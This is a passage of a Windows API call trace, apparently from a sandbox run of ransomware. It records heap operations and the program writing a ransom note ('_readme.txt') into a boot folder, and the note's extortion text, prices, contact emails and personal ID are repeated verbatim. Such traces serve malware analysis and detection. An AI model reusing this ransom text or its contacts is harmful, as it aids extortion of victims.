hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.752] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.752] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.752] PathFindFileNameW (pszPath="") returned="" [0090.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.752] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.753] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.753] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.753] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0090.753] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.754] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0090.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.755] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.755] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.755] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.756] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.756] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.757] CloseHandle (hObject=0x5cc) returned 1 [0090.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.757] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.757] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.757] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.757] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.757] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.757] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.758] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.758] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.758] RtlAllocateHeap 